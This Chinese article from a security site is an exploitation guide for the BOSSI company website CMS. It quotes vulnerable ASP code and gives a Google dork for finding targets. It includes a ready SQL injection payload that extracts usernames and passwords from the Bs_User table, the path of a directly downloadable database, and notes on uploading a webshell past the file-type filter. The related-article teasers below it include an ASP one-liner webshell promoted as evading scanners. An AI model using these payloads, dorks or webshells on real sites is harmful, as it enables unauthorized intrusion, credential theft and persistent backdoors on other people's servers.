BOSSI 公司企业网站管理系统注入&上传漏洞利用

所属分类: 网络安全 / 脚本攻防 阅读数: 1151
收藏 0 赞 0 分享
让不懂编写网页的人也可以有自己的公司(企业)网站,基本资料都在后台管理添加修改,网站的标题、地址、版权、公司邮局、收藏等资料可以在后台的"公司资料"里管理

----------------------------------------------------
漏洞一:注入漏洞,

漏洞页面:NewsInfo.asp,

漏洞代码:if not isEmpty(request.QueryString("id")) then
id=request.QueryString("id")
else
id=1
end if

Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open "Select * From Conews where id="&id, conn,3,3
'纪录访问次数
rs("counter")=rs("counter")+1
rs.update
nCounter=rs("counter")

id变量未处理直接代入sql查询,可注射,用啊d就行

页面二:yeNewsInfo.asp

漏洞代码:<%
if not isEmpty(request.QueryString("id")) then
id=request.QueryString("id")
else
id=1
end if

Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open "Select * From Yenews where id="&id, conn,3,3
'纪录访问次数
rs("counter")=rs("counter")+1
rs.update
nCounter=rs("counter")
'定义内容
content=ubbcode(rs("content"))
%>

原理同上,可注入。

漏洞二:数据库下载漏洞

数据库地址:Database/DataShop.mdb

为建立放下载表,可任意下载!

漏洞三:上传漏洞

漏洞页面:upfile.asp ,upfilea.asp

问题代码:fileExt=lcase(file.FileExt)
   Forumupload=split(UpFileType,"|")
   for i=0 to ubound(Forumupload)
    if fileEXT=trim(Forumupload(i)) then
     EnableUpload=true
     exit for
    end if
   next
   if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
    EnableUpload=false
   end if
   if EnableUpload=false then
    msg="这种文件类型不允许上传!\n\n只允许上传这几种文件类型:" & UpFileType
    founderr=true
   end if

和那个良精的上传漏洞一样,不知道是谁抄谁的代码了!注册用户,本地上传php的大马或者加空格过滤上传asp大马,具体方法我就不说了,在浅析良精企业网站管理程序一文中提到过了!不再赘述!

漏洞利用:注入,Google:inurl:yeNewsInfo.asp?Id

注入语句:%20and%201=2%20union%20select%201,username,3,4,password%20from%20Bs_User

 

或者啊d:需要手动添加表段:Bs_User

数据库漏洞利用:

挖掘机:关键字:inurl:yeNewsInfo.asp?Id

后缀:Database/DataShop.mdb

关于上传漏洞的利用我就不演示了,可参照 浅析良精企业网站管理系统漏洞 一文。

更多精彩内容其他人还在看

防范 dedecms 广告内容插入后门

dedecms广告内容没有做限制,可以输入脚本信息,并写入文件,导致木马植入! 此补丁,是防止广告里带PHP脚本并写入文件! 核心代码:ad_js.php 复制代码代码如下: //禁止写入和PHP脚本有关字符信息 //========================... 查看详情
收藏 0 赞 0 分享

记一次发现利用preg_replace隐藏后门和后续探究

事情是这样的,朋友的网站的利用各种查找后门的工具都没有发现php木马。老是找不到,小黑的伎俩很高级,每次使用完毕总是把后门删掉,但是每次都能继续进来,总是找不到从哪进来的。这个着实让人蛋疼。 后来,终于在日志中发现一丝蛛丝马迹,通过我的分析,我发现一个IP总是很奇怪的P... 查看详情
收藏 0 赞 0 分享

Linux系统采用netstat命令查看DDOS攻击的方法

Linux系统用netstat命令查看DDOS攻击具体命令用法如下: 复制代码代码如下:netstat -na 显示所有连接到服务器的活跃的网络连接 复制代码代码如下:netstat -an | grep :80 | sort 只显示连接到80段口的活跃的网络连接,80是... 查看详情
收藏 0 赞 0 分享

Linux实用一句话&脚本介绍

1、查看谁破解你的ssh cat /var/log/auth.log | grep "pam_unix(sshd:auth): authentication failure;" | cut -f14 -d\ | cut -d'=' -f2 | sort | u... 查看详情
收藏 0 赞 0 分享

史上最全的各个脚本的一句话木马

以下这个ASP一句话 <%If Request("1") "" Then ExecuteGlobal(Request("1"))%> 上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会... 查看详情
收藏 0 赞 0 分享

serv-u最新通杀所有版本0day asp代码

要不容易出错的。 复制代码代码如下: <style type="text/css"> <!-- body,td,th { font-size: 12px; } --> </style> <% Function httpopen(neiro... 查看详情
收藏 0 赞 0 分享

Linux下防御/减轻DDOS攻击的方法

今天要说的就是一款能够自动屏蔽DDOS攻击者IP的软件:DDoS deflate。 DDoS deflate介绍 DDoS deflate是一款免费的用来防御和减轻DDoS攻击的脚本。它通过netstat监测跟踪创建大量网络连接的IP地址,在检测到某个结点超过预设的限 制时,该程... 查看详情
收藏 0 赞 0 分享

脚本防止SSH和vsftpd暴力破解的代码分享

我随便看了看/var/log/secure日志,显示如下: 复制代码代码如下: 118.33.110.52=2834 119.145.254.77=37 121.254.179.199=226 121.88.250.243=35 200.29.110.104=168 202.78... 查看详情
收藏 0 赞 0 分享

分享一个不错的iptables脚本

代码如下: 复制代码代码如下: #!/bin/sh # modprobe ipt_MASQUERADE modprobe ip_conntrack_ftp modprobe ip_nat_ftp iptables -F iptables -t nat -F iptables -X... 查看详情
收藏 0 赞 0 分享

php intval()函数使用不当的安全漏洞分析

一、描述   intval函数有个特性:"直到遇上数字或正负符号才开始做转换,再遇到非数字或字符串结束时(\0)结束转换",在某些应用程序里由于对intval函数这个特性认识不够,错误的使用导致绕过一些安全判断导致安全漏洞. 二、分析 php程序员站 复制代码... 查看详情
收藏 0 赞 0 分享
查看更多